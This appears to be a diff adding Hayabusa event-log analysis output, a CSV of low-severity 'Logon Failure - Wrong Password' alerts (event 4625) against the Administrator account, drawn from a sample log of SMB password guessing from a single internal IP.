+2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
